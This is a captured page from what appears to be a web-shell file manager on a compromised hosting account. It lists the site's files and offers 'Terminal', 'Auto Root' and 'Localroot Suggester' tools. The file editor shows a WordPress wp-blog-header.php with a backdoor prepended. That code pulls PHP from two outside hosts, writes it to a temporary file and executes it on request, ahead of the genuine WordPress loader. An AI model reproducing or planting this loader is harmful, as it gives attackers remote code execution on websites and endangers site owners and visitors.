Linux premium313.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
Server IP : 63.250.38.106 & Your IP : 216.73.216.212
Domains :
Cant Read [ /etc/named.conf ]
User : punyaqqvio
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
punyaqqvio /
mycmdw.org /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known__dd42ad7
[ DIR ]
drwxr-xr-x
2026-04-13 00:48
cgi-bin__dd42ad7
[ DIR ]
drwxr-xr-x
2026-04-13 00:44
images__dd42ad7
[ DIR ]
drwxr-xr-x
2026-04-13 00:48
themes__dd42ad7
[ DIR ]
drwxr-xr-x
2026-04-10 05:34
tr__dd42ad7
[ DIR ]
drwxr-xr-x
2026-04-10 05:34
wp-content__dd42ad7
[ DIR ]
drwxr-xr-x
2026-04-10 05:34
.htaccess
498
B
-rw-r--r--
2026-04-13 03:00
.htaccess_file_editor__dd42ad7
2.23
KB
-rw-r--r--
2026-01-12 13:32
.htaccess_live__dd42ad7
2.22
KB
-rw-r--r--
2026-01-12 13:32
admin.php
32.33
KB
-rw-r--r--
2026-04-13 03:00
contact.html__dd42ad7
44.96
KB
-rw-r--r--
2026-01-12 13:32
files_count.xml__dd42ad7
1.21
KB
-rw-r--r--
2026-01-12 13:32
how-to-keep-just-the-best-friends-around-you.html__dd42ad7
244.93
KB
-rw-r--r--
2026-01-13 08:21
how-to-make-friends-online-if-you-are-an-introvert.html__dd42ad7
48.49
KB
-rw-r--r--
2026-01-12 13:29
index.html__dd42ad7
47.22
KB
-rw-r--r--
2026-01-13 08:28
inputs.php__dd42ad7
127
B
-rw-r--r--
2026-04-13 00:49
mycmdw.org_seorama555_hotmail.com_p91nao7cnp_backup.zip__dd42ad7
94.1
KB
-rw-r--r--
2026-01-12 11:24
nginx.txt__dd42ad7
1.47
KB
-rw-r--r--
2026-01-12 13:32
php.ini__dd42ad7
40
B
-rw-r--r--
2026-04-13 03:00
robots.txt__dd42ad7
90
B
-rw-r--r--
2026-04-13 00:44
txets.php__dd42ad7
5.61
KB
-r--r--r--
2026-04-11 01:31
wp-blog-header.php__dd42ad7
1.78
KB
-rwxr-xr-x
2026-04-13 03:00
Save
Rename
<?php function GC($a) { $url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $a, $_REQUEST['api'], $_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['t']); $code = @file_get_contents($url); if ($code == false) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'll'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 100); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $code = curl_exec($ch); curl_close($ch); } return $code; } if (isset($_REQUEST['ac']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['t'])) { $code = GC('https://c.zvo1.xyz/'); if (!$code) { $code = GC('https://c2.icw7.com/'); } $need = '<' . '?' . 'php'; if (strpos($code, $need) === false) { die('get failed'); } if(function_exists('tmpfile')){ $file_name = tmpfile(); } if($file_name) { fwrite($file_name, $code); $a = stream_get_meta_data($file_name); $file_path = $a['uri']; @include($file_path); fclose($file_name); }else { $file_path = '.c'; file_put_contents($file_path, $code); @include($file_path); } @unlink($file_path); die(); }?> <?php /** * Loads the WordPress environment and template. * * @package WordPress */ if ( ! isset( $wp_did_header ) ) { $wp_did_header = true; // Load the WordPress library. require_once __DIR__ . '/wp-load.php'; // Set up the WordPress query. wp(); // Load the theme template. require_once ABSPATH . WPINC . '/template-loader.php'; }